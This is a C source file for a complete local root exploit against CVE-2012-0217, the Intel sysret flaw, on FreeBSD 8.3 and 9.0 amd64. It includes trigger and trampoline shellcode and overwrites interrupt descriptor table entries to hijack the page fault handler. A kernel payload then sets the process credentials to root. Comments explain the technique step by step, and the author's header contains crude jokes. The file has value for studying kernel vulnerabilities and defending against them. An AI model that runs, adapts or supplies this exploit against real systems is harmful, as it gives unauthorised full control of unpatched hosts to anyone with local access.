// CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
// Copyright 2012 all right reserved, not for commercial uses, bitches
// Infringement Punishment: Monkeys coming out of your ass Bruce Almighty style.
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/utsname.h>
#include <machine/cpufunc.h>
#define _WANT_UCRED
#include <sys/proc.h>
#include <machine/segments.h>
#include <sys/param.h>
#include <sys/linker.h>

uintptr_t Xofl_ptr, Xbnd_ptr, Xill_ptr, Xdna_ptr, Xpage_ptr, Xfpu_ptr, Xalign_ptr, Xmchk_ptr, Xxmm_ptr;

struct gate_descriptor * sidt()
{
    struct region_descriptor idt;

    asm ("sidt %0": "=m"(idt));

    return (struct gate_descriptor*)idt.rd_base;
}

u_long get_symaddr(char *symname)
{
    struct kld_sym_lookup ksym;

    ksym.version = sizeof (ksym);
    ksym.symname = symname;

    if (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
        perror("kldsym");
        exit(1);
    }
    printf("    [+] Resolved %s to %#lx\n", ksym.symname, ksym.symvalue);
    return ksym.symvalue;
}

// Code taken from amd64/amd64/machdep.c
void setidt(struct gate_descriptor *idt, int idx, uintptr_t func, int typ, int dpl, int ist)
{
    struct gate_descriptor *ip;

    ip = idt + idx;
    ip->gd_looffset = func;
    ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);
    ip->gd_ist = ist;
    ip->gd_xx = 0;
    ip->gd_type = typ;
    ip->gd_dpl = dpl;
    ip->gd_p = 1;
    ip->gd_hioffset = func>>16;
}

void shellcode()
{
    // Actually we dont really need to spawn a shell since we
    // changed our whole cred struct.
    // Just exit...
    printf("[*] Got root!\n");
    exit(0);
}

void kernelmodepayload()
{
    struct thread *td;
    struct ucred *cred;

    // We need to restore/recover whatever we smashed
    // We inititalized rsp to idt[14] + 10*8, i.e. idt[19] (see trigger())
    // The #GP exception frame writes 6*64bit registers, i.e. it overwrites
    // idt[18], idt[17] and idt[16]
    // thus overall we have:
    // - idt[18], idt[17] and idt[16] are trashed
    // - tf_addr -> overwrites the 64bit-LSB of idt[15]
    // - tf_trapno -> overwrites Target Offset[63:32] of idt[14]
    // - rdi -> overwrites the 64bit-LSB of idt[7]
    // - #PF exception frame overwrites idt[6], idt[5] and idt[4]
    struct gate_descriptor *idt = sidt();
    setidt(idt, IDT_OF, Xofl_ptr, SDT_SYSIGT, SEL_KPL, 0); // 4
    setidt(idt, IDT_BR, Xbnd_ptr, SDT_SYSIGT, SEL_KPL, 0); // 5
    setidt(idt, IDT_UD, Xill_ptr, SDT_SYSIGT, SEL_KPL, 0); // 6
    setidt(idt, IDT_NM, Xdna_ptr, SDT_SYSIGT, SEL_KPL, 0); // 7
    setidt(idt, IDT_PF, Xpage_ptr, SDT_SYSIGT, SEL_KPL, 0); // 14
    setidt(idt, IDT_MF, Xfpu_ptr, SDT_SYSIGT, SEL_KPL, 0); // 15
    setidt(idt, IDT_AC, Xalign_ptr, SDT_SYSIGT, SEL_KPL, 0); // 16
    setidt(idt, IDT_MC, Xmchk_ptr, SDT_SYSIGT, SEL_KPL, 0); // 17
    setidt(idt, IDT_XF, Xxmm_ptr, SDT_SYSIGT, SEL_KPL, 0); // 18

    // get the thread pointer
    asm ("mov %%gs:0, %0" : "=r"(td));

    // The Dark Knight Rises
    cred = td->td_proc->p_ucred;
    cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;
    cred->cr_groups[0] = 0;

    // return to user mode to spawn the shell
    asm ("swapgs; sysretq;" :: "c"(shellcode)); // store the shellcode addr to rcx
}

#define TRIGGERCODESIZE 20
#define TRAMPOLINECODESIZE 18

void trigger()
{
    printf("[*] Setup...\n");
    // Allocate one page just before the non-canonical address
    printf("    [+] Trigger code...\n");
    uint64_t pagesize = getpagesize();
    uint8_t * area = (uint8_t*)((1ULL << 47) - pagesize);
    area = mmap(area, pagesize,
        PROT_READ | PROT_WRITE | PROT_EXEC,
        MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
    if (area == MAP_FAILED) {
        perror("mmap (trigger)");
        exit(1);
    }

    // Copy the trigger code at the end of the page
    // such that the syscall instruction is at its
    // boundary
    char triggercode[] =
        "\xb8\x18\x00\x00\x00" // mov rax, 24; #getuid
        "\x48\x89\xe3" // mov rbx, rsp; save the user's stack for later
        "\x48\xbc\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rsp, 0xdeadc0decafebabe
        "\x0f\x05"; // syscall

    uint8_t * trigger_addr = area + pagesize - TRIGGERCODESIZE;
    memcpy(trigger_addr, triggercode, TRIGGERCODESIZE);

    // There are two outcomes given a target rsp:
    // - if rsp can't be written to, a double fault is triggered
    //   (Xdblfault defined in sys/amd64/amd64/exception.S)
    //   and the exception frame is pushed to a special stack
    // - otherwise a #GP is triggered
    //   (Xprot defined in sys/amd64/amd64/exception.S)
    //   and the exception frame is pushed to [rsp]
    //
    // In the latter case, trouble is... #GP triggers a page fault
    // (Xpage):
    //  IDTVEC(prot)
    //      subq    $TF_ERR,%rsp
    //  [1] movl    $T_PROTFLT,TF_TRAPNO(%rsp)
    //  [2] movq    $0,TF_ADDR(%rsp)
    //  [3] movq    %rdi,TF_RDI(%rsp)   /* free up a GP register */
    //      leaq    doreti_iret(%rip),%rdi
    //      cmpq    %rdi,TF_RIP(%rsp)
    //      je  1f          /* kernel but with user gsbase!! */
    //  [4] testb   $SEL_RPL_MASK,TF_CS(%rsp) /* Did we come from kernel? */
    //      jz  2f          /* already running with kernel GS.base */
    //  1:  swapgs
    //  2:  movq    PCPU(CURPCB),%rdi [5]
    //
    // [4] sets the Z flag because we come from the kernel (while executing sysret)
    // and we therefore skip swapgs. But GS is in fact the user GS.base! Indeed
    // it was restored just before calling sysret...
    // Thus, [5] triggers a pagefault while trying to access gs:data
    // If we don't do anything we'll eventually doublefault, tripplefault etc. and crash
    //
    // We therefore need a way: (1) to recover from the GP, (2) to clean
    // any mess we did. Both could be solved if we can get get an arbitrary
    // code execution by the time we reach [5] (NB: this is not mandatory, we could
    // get the code execution later down the fault trigger chain)
    //
    // So... here is the idea: wouldn't it be nice if we could overwrite the
    // page fault handler's address and therefore get code execution when [5]
    // triggers the #PF?
    //
    // For reference:
    // Gate descriptor:
    // +0: Target Offset[15:0] | Target Selector
    // +4: Some stuff | Target Offset[31:16]
    // +8: Target Offset[63:32]
    // +12: Stuff
    //
    // and from include/frame.h:
    //  struct trapframe {
    //      register_t  tf_rdi;
    //      register_t  tf_rsi;
    //      register_t  tf_rdx;
    //      register_t  tf_rcx;
    //      register_t  tf_r8;
    //      register_t  tf_r9;
    //      register_t  tf_rax;
    //      register_t  tf_rbx;
    //      register_t  tf_rbp;
    //      register_t  tf_r10;
    //      register_t  tf_r11;
    //      register_t  tf_r12;
    //      register_t  tf_r13;
    //      register_t  tf_r14;
    //      register_t  tf_r15;
    //      uint32_t    tf_trapno;
    //      uint16_t    tf_fs;
    //      uint16_t    tf_gs;
    //      register_t  tf_addr;
    //      uint32_t    tf_flags;
    //      uint16_t    tf_es;
    //      uint16_t    tf_ds;
    //      /* below portion defined in hardware */
    //      register_t  tf_err;
    //      register_t  tf_rip;
    //      register_t  tf_cs;
    //      register_t  tf_rflags;
    //      register_t  tf_rsp;
    //      register_t  tf_ss;
    //  };
    //
    // When the exception is triggered, the hardware pushes
    // ss, rsp, rflags, cs, rip and err
    //
    // We can see that [1], [2] and [3] write to the stack
    // [3] is fully user-controlled through rdi, so we could try to align
    // rsp such that [3] overwrites the offset address
    //
    // The trouble is... rsp is 16byte aligned for exceptions. We can
    // therefore only overwrite the first 32-LSB of the offset address
    // (check how rdi is 16byte aligned in this trapframe)
    //
    // [2] writes 0 to tf_addr which is also 16byte aligned. So no dice.
    // That leaves us with [1] which writes T_PROTFLT (0x9) to tf_trapno
    // and tf_trapno is 16byte aligned + 8!
    // This enables us to set Target Offset[63:32] to 0x9
    //
    // We set rsp to &idt[14] + 10 * 8 (to align tf_trapno with Offset[63:32])
    *(uint64_t*)(trigger_addr + 10) = (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8);
    // Hence, the #PF handler's address is now 0x9WWXXYYZZ
    // Furthermore, WWXXYYZZ is known since we can get (see get_symaddr()) the #PF's address
    // Thus, the idea is to setup a trampoline code at 0x9WWXXYYZZ which does
    // some setup and jump to our kernel mode code
    printf("    [+] Trampoline code...\n");
    char trampolinecode[] =
        "\x0f\x01\xf8" // swapgs; switch back to the kernel's GS.base
        "\x48\x89\xdc" // mov rsp, rbx; restore rsp, it's enough to use the user's stack
        "\x48\xb8\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rax, 0xdeadc0decafebabe
        "\xff\xe0"; // jmp rax

    uint8_t * trampoline = (uint8_t*)(0x900000000 | (Xpage_ptr & 0xFFFFFFFF));
    size_t trampoline_allocsize = pagesize;
    // We round the address to the PAGESIZE for the allocation
    // Not enough space for the trampoline code ?
    if ((uint8_t*)((uint64_t)trampoline & ~(pagesize-1)) + pagesize < trampoline + TRAMPOLINECODESIZE)
        trampoline_allocsize += pagesize;
    if (mmap((void*)((uint64_t)trampoline & ~(pagesize-1)), trampoline_allocsize,
        PROT_READ | PROT_WRITE | PROT_EXEC,
        MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED)
    {
        perror("mmap (trampoline)");
        exit(1);
    }
    memcpy(trampoline, trampolinecode, TRAMPOLINECODESIZE);
    *(uint64_t*)(trampoline + 8) = (uint64_t)kernelmodepayload;
    // Call it
    printf("[*] Fire in the hole!\n");
    ((void (*)())trigger_addr)();
}

typedef struct validtarget
{
    char * sysname;
    char * release;
    char * machine;
} validtarget_t;

int validate_target(char * sysname, char * release, char * machine)
{
    validtarget_t targets[] = {
        { "FreeBSD", "8.3-RELEASE", "amd64" },
        { "FreeBSD", "9.0-RELEASE", "amd64" },
        { 0, 0, 0 }
    };

    int found = 0;
    int i = 0;

    while (!found && targets[i].sysname) {
        found = !strcmp(targets[i].sysname, sysname)
            && !strcmp(targets[i].release, release)
            && !strcmp(targets[i].machine, machine);
        ++i;
    }
    return found;
}

void get_cpu_vendor(char * cpu_vendor)
{
    u_int regs[4];

    do_cpuid(0, regs);
   ((u_int *)cpu_vendor)[0] = regs[1];
   ((u_int *)cpu_vendor)[1] = regs[3];
   ((u_int *)cpu_vendor)[2] = regs[2];
   cpu_vendor[12] = '\0';
}

int is_intel()
{
    char cpu_vendor[13];

    get_cpu_vendor(cpu_vendor);
    return !strcmp(cpu_vendor, "GenuineIntel");
}

int main(int argc, char *argv[])
{
    printf("CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)\n\n");

    printf("[*] Retrieving host information...\n");
    char cpu_vendor[13];
    get_cpu_vendor(cpu_vendor);
    struct utsname ver;
    uname(&ver);
    printf("    [+] CPU: %s\n", cpu_vendor);
    printf("    [+] sysname: %s\n", ver.sysname);
    printf("    [+] release: %s\n", ver.release);
    printf("    [+] version: %s\n", ver.version);
    printf("    [+] machine: %s\n", ver.machine);
    printf("[*] Validating target OS and version...\n");
    if (!is_intel() || !validate_target(ver.sysname, ver.release, ver.machine)) {
        printf("    [+] NOT Vulnerable :-(\n");
        exit(1);
    } else
        printf("    [+] Vulnerable :-)\n");
    // Prepare the values we'll need to restore the kernel to a stable state
    printf("[*] Resolving kernel addresses...\n");
    Xofl_ptr = (uintptr_t)get_symaddr("Xofl");
    Xbnd_ptr = (uintptr_t)get_symaddr("Xbnd");
    Xill_ptr = (uintptr_t)get_symaddr("Xill");
    Xdna_ptr = (uintptr_t)get_symaddr("Xdna");
    Xpage_ptr = (uintptr_t)get_symaddr("Xpage");
    Xfpu_ptr = (uintptr_t)get_symaddr("Xfpu");
    Xalign_ptr = (uintptr_t)get_symaddr("Xalign");
    Xmchk_ptr = (uintptr_t)get_symaddr("Xmchk");
    Xxmm_ptr = (uintptr_t)get_symaddr("Xxmm");
    // doeet!
    trigger();
    return 0;
}